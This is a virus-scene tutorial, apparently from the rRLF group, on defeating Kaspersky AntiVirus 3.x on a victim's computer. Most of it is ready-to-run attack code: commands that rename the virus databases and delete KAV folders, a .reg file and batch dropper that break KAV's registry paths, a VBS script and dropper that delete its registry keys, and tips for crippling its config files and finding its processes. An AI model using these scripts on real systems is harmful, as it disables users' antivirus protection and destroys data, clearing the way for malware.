----------------------------------- Defeating Kaspersky AntiVirus ----------------------------------- by DvL [rRLF] # This retro document only reffers to KAV 3.x 1.Renaming .avc files ------------------- I think this is the easiest way. Usually they are located in C:\PROGRA~1\COMMON~1\AVPSHA~1\AVPBASES\*.AVC Just do like this: ren C:\PROGRA~1\COMMON~1\AVPSHA~1\AVPBASES\*.AVC C:\PROGRA~1\COMMON~1\AVPSHA~1\AVPBASES\*.your-extension 2.Deleting all possible files --------------------------- U can easily make this with the deltree/y file.extension>nul or like in those example: deltree/y c:\avp\>nul --> this will delete everything from this folder including subdirectories or hide and system files except files in use deltree/y c:\avp30\>nul deltree/y c:\avpers~1\>nul deltree/y c:\kasper~1\>nul deltree/y c:\kasper~2\>nul deltree/y c:\progra~1\avp\>nul deltree/y c:\progra~1\avpers~1\>nul deltree/y c:\progra~1\common~1\avpsha~1\>nul deltree/y c:\progra~1\kasper~1\>nul deltree/y c:\progra~1\kasper~2\>nul 3.Atacking KAV via registry ------------------------- Method A ======== Just copy this into a .reg file or use the already maked .bat file down this page. In those examples i`m changing the used folders to c:\. ------------------------reg file------------------------ REGEDIT4 [HKEY_LOCAL_MACHINE\Software\KasperskyLab\SharedFiles] "avpfolder"="c:\" [HKEY_LOCAL_MACHINE\Software\KasperskyLab\SharedFiles] "VEDataFilePath"="c:\" [HKEY_LOCAL_MACHINE\Software\KasperskyLab\SharedFiles] "VEIndexFilePath"="c:\" [HKEY_LOCAL_MACHINE\Software\KasperskyLab\SharedFiles] "MainDir"="c:\" [HKEY_LOCAL_MACHINE\Software\KasperskyLab\SharedFiles] "Folder"="c:\" ------------------------reg file------------------------ ------------------------bat file------------------------ ctty nul echo.REGEDIT4>antikav.reg echo.>>antikav.reg echo.[HKEY_LOCAL_MACHINE\Software\KasperskyLab\SharedFiles]>>antikav.reg echo."avpfolder"="c:\">>antikav.reg echo.[HKEY_LOCAL_MACHINE\Software\KasperskyLab\SharedFiles]>>antikav.reg echo."VEDataFilePath"="c:\">>antikav.reg echo.[HKEY_LOCAL_MACHINE\Software\KasperskyLab\SharedFiles]>>antikav.reg echo."VEIndexFilePath"="c:\">>antikav.reg echo.[HKEY_LOCAL_MACHINE\Software\KasperskyLab\SharedFiles]>>antikav.reg echo."MainDir"="c:\">>antikav.reg echo.[HKEY_LOCAL_MACHINE\Software\KasperskyLab\SharedFiles]>>antikav.reg echo."Folder"="c:\">>antikav.reg ctty con regedit /s antikav.reg cls ------------------------bat file------------------------ Method B ======== Another method is by deleting keys related to KAV via a .vbs file. ------------------------vbs file------------------------ set a=createobject("WScript.Shell") a.RegDelete("HKEY_LOCAL_MACHINE\Software\KasperskyLab\Components\3\") a.RegDelete("HKEY_LOCAL_MACHINE\Software\KasperskyLab\Components\100\") a.RegDelete("HKEY_LOCAL_MACHINE\Software\KasperskyLab\Components\101\") a.RegDelete("HKEY_LOCAL_MACHINE\Software\KasperskyLab\Components\2C\") a.RegDelete("HKEY_LOCAL_MACHINE\Software\KasperskyLab\Components\") a.RegDelete("HKEY_LOCAL_MACHINE\Software\KasperskyLab\InstalledProducts\AVP for WS\") a.RegDelete("HKEY_LOCAL_MACHINE\Software\KasperskyLab\InstalledProducts\") a.RegDelete("HKEY_LOCAL_MACHINE\Software\KasperskyLab\SharedFiles\") a.RegDelete("HKEY_CURRENT_USER\Software\KasperskyLab\ScriptAddon\") a.RegDelete("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Uninstall\Kaspersky Anti-Virus (AVP)\") a.RegDelete("HKEY_CLASSES_ROOT\AVPKeyFile\shell\") a.RegDelete("HKEY_CLASSES_ROOT\AVPKeyFile\") ------------------------vbs file------------------------ ------------------------bat file------------------------ ctty nul echo.set a=createobject("WScript.Shell")>antikav.vbs echo.a.RegDelete("HKEY_LOCAL_MACHINE\Software\KasperskyLab\Components\3\")>>antikav.vbs echo.a.RegDelete("HKEY_LOCAL_MACHINE\Software\KasperskyLab\Components\100\")>>antikav.vbs echo.a.RegDelete("HKEY_LOCAL_MACHINE\Software\KasperskyLab\Components\101\")>>antikav.vbs echo.a.RegDelete("HKEY_LOCAL_MACHINE\Software\KasperskyLab\Components\2C\")>>antikav.vbs echo.a.RegDelete("HKEY_LOCAL_MACHINE\Software\KasperskyLab\Components\")>>antikav.vbs echo.a.RegDelete("HKEY_LOCAL_MACHINE\Software\KasperskyLab\InstalledProducts\AVP for WS\")>>antikav.vbs echo.a.RegDelete("HKEY_LOCAL_MACHINE\Software\KasperskyLab\InstalledProducts\")>>antikav.vbs echo.a.RegDelete("HKEY_LOCAL_MACHINE\Software\KasperskyLab\SharedFiles\")>>antikav.vbs echo.a.RegDelete("HKEY_CURRENT_USER\Software\KasperskyLab\ScriptAddon\")>>antikav.vbs echo.a.RegDelete("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Uninstall\Kaspersky Anti-Virus (AVP)\")>>antikav.vbs echo.a.RegDelete("HKEY_CLASSES_ROOT\AVPKeyFile\shell\")>>antikav.vbs echo.a.RegDelete("HKEY_CLASSES_ROOT\AVPKeyFile\")>>antikav.vbs ctty con cscript antikav.vbs cls ------------------------bat file------------------------ 4.Using "set" encryption ---------------------- I think here is no need to xplain, just use it like in this example: set temp=c:\windows\temp 5.Finding KAV locations via registry ---------------------------------- I`ve found how to know where is KAV installed on victims computer; just follow those entries in regedit to find out more. [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\avp32.exe] [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\avpupd.exe] 6.Defeat KAV with it`s own files ------------------------------ How ? Simple ... In AVP30 for MS-DOS there`s a file called "Defdos32.prf" with his settings and more, just make some good changes in it, like not checking memory, files, sectors or certain extensions. In KAV 3.5 for windoze, there`s "avp.ini" where it shows the keys-path and the base-path. Just change the keyspath and the victim will run an unregistered program. 7.Other things, useful, too ------------------------- A.Info on several files by SnakeByte ================================== I.Files: *.avc Virus Database ( The Normal EXE Files seem to start the _ ones ) _avp32.exe AVP Avtiviral scaner shell _avpcc.exe AVP Control Centre Application _avpm.exe AVP Monitor avp32.exe AVP Scanner ( Main File ) avpcc.exe AVP Control Centre Application avpm.exe AVP Monitor avpdos32.exe AVP Scanner for DOS avptc32.exe AVP Scanner for DOS exec.exe unknown avpupd.exe AVP Update ( leeches new *.avc files ) II.Window-Names: AVP Monitor AntiViral Toolkit Pro AVP Updates Kaspersky Anti-Virus B.Sorting command prompt for AVP for MS-DOS ========================================= AVPDOS32 /S /Y /* /M /B /P /V /H /W=AVP.LOG c:\sorted ------------- Contact ------------- # dvl2003ro@yahoo.co.uk # www.geocities.com/batch_zone # www.rrlf.de